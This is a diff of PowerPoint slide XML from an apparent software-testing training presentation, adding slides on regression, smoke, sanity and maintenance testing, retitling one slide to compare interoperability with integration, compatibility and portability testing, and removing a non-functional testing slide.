+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>B ii, iii and iv.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>C </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>, ii and iii.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>D </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t> and iii.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buNone/>
+              <a:tabLst/>
+              <a:defRPr/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>-----------------------------------------------------------------------------------------------------------</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Question </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
               <a:t>5</a:t>
             </a:r>
           </a:p>
@@ -5092,7 +4880,7 @@
             <a:fld id="{D75B0C5A-EE92-4E92-8F5B-10699705BBE2}" type="slidenum">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:pPr/>
-              <a:t>10</a:t>
+              <a:t>12</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -8166,7 +7954,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1766645597"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1766645597"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8200,6 +7988,501 @@
           <a:chExt cx="0" cy="0"/>
         </a:xfrm>
       </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="533400"/>
+            <a:ext cx="5052024" cy="630942"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:effectLst>
+                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
+                    <a:srgbClr val="000000">
+                      <a:alpha val="43137"/>
+                    </a:srgbClr>
+                  </a:outerShdw>
+                </a:effectLst>
+              </a:rPr>
+              <a:t>Testing Related to Changes</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="3500" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1">
+                  <a:lumMod val="65000"/>
+                  <a:lumOff val="35000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:effectLst>
+                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
+                  <a:srgbClr val="000000">
+                    <a:alpha val="43137"/>
+                  </a:srgbClr>
+                </a:outerShdw>
+              </a:effectLst>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Rectangle 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="611437" y="1712098"/>
+            <a:ext cx="7416947" cy="1200329"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Regression testing may be performed at all test levels, and includes functional, non-functional and structural testing. Regression test suites are run many times and generally evolve slowly, so regression testing is a strong candidate for automation. </a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="3185448"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="13" name="Прямоугольник 12"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="3068960"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Smoke testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="15" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="3617496"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="18" name="Прямоугольник 17"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="3501008"/>
+            <a:ext cx="5652120" cy="369332"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Sanity testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="19" name="Flowchart: Connector 13"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="936104" y="4049544"/>
+            <a:ext cx="84841" cy="99536"/>
+          </a:xfrm>
+          <a:prstGeom prst="flowChartConnector">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent6"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent6"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent6"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="20" name="Прямоугольник 19"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1224136" y="3933056"/>
+            <a:ext cx="5652120" cy="646331"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Bug regression, old bug regression and side effect testing as parts of regression testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4060775951"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide11.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="533400"/>
+            <a:ext cx="3957109" cy="630942"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="none" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1">
+                    <a:lumMod val="65000"/>
+                    <a:lumOff val="35000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:effectLst>
+                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
+                    <a:srgbClr val="000000">
+                      <a:alpha val="43137"/>
+                    </a:srgbClr>
+                  </a:outerShdw>
+                </a:effectLst>
+              </a:rPr>
+              <a:t>Maintenance Testing</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" sz="3500" dirty="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1">
+                  <a:lumMod val="65000"/>
+                  <a:lumOff val="35000"/>
+                </a:schemeClr>
+              </a:solidFill>
+              <a:effectLst>
+                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
+                  <a:srgbClr val="000000">
+                    <a:alpha val="43137"/>
+                  </a:srgbClr>
+                </a:outerShdw>
+              </a:effectLst>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Rectangle 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="611437" y="1712098"/>
+            <a:ext cx="7416947" cy="2308324"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Once deployed, a software system is often in service for years or decades. During this time the system, its configuration data, or its environment are often corrected, changed or extended.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>So, the maintenance testing is necessary.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>It is testing the changes to an operational system or the impact of a changed environment to an operational system.</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4060775951"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
+  <p:timing>
+    <p:tnLst>
+      <p:par>
+        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
+      </p:par>
+    </p:tnLst>
+  </p:timing>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
       <p:pic>
         <p:nvPicPr>
           <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\jkad\Desktop\Trainings\SoftReports\Pictures\1238776843_pic_id14985.jpeg"/>
@@ -8212,7 +8495,7 @@
           <a:blip r:embed="rId3" cstate="print">
             <a:extLst>
               <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="" val="0"/>
               </a:ext>
             </a:extLst>
           </a:blip>
@@ -8232,7 +8515,7 @@
           <a:noFill/>
           <a:extLst>
             <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
-              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                 <a:solidFill>
                   <a:srgbClr val="FFFFFF"/>
                 </a:solidFill>
@@ -8457,7 +8740,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3400026356"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="3400026356"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9014,7 +9297,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3292176594"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="3292176594"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9383,7 +9666,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4060775951"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4060775951"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9391,7 +9674,7 @@
     <a:masterClrMapping/>
   </p:clrMapOvr>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
+    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" Requires="p14">
       <p:transition spd="slow" p14:dur="2000"/>
     </mc:Choice>
     <mc:Fallback>
@@ -9799,7 +10082,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4060775951"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4060775951"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9807,7 +10090,7 @@
     <a:masterClrMapping/>
   </p:clrMapOvr>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
+    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" Requires="p14">
       <p:transition spd="slow" p14:dur="2000"/>
     </mc:Choice>
     <mc:Fallback>
@@ -10172,7 +10455,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4060775951"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4060775951"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -10180,7 +10463,7 @@
     <a:masterClrMapping/>
   </p:clrMapOvr>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
-    <mc:Choice xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
+    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" Requires="p14">
       <p:transition spd="slow" p14:dur="2000"/>
     </mc:Choice>
     <mc:Fallback>
@@ -10223,7 +10506,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="457200" y="533400"/>
-            <a:ext cx="4435766" cy="630942"/>
+            <a:ext cx="8291264" cy="1169551"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -10231,7 +10514,7 @@
           <a:noFill/>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr wrap="none" rtlCol="0">
+          <a:bodyPr wrap="square" rtlCol="0">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
@@ -10252,7 +10535,7 @@
                   </a:outerShdw>
                 </a:effectLst>
               </a:rPr>
-              <a:t>Non-functional Testing</a:t>
+              <a:t>Interoperability Testing VS Integration, Compatibility, and Portability Testing</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" sz="3500" dirty="0">
               <a:solidFill>
@@ -10272,757 +10555,223 @@
           </a:p>
         </p:txBody>
       </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="Rectangle 6"/>
-          <p:cNvSpPr/>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="13" name="Рисунок 12" descr="compatibility.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3" cstate="print"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="611437" y="1712098"/>
-            <a:ext cx="7416947" cy="646331"/>
+            <a:off x="323528" y="4005064"/>
+            <a:ext cx="1584175" cy="1429048"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>The non-function characteristics are </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
-              <a:t>“how”</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t> the system does. Non-functional testing may be performed at all test levels.</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="14" name="Flowchart: Connector 13"/>
-          <p:cNvSpPr/>
+      </p:pic>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="15" name="Рисунок 14" descr="integration.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId4" cstate="print"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="958767" y="2636912"/>
-            <a:ext cx="84841" cy="99536"/>
-          </a:xfrm>
-          <a:prstGeom prst="flowChartConnector">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent6"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent6"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
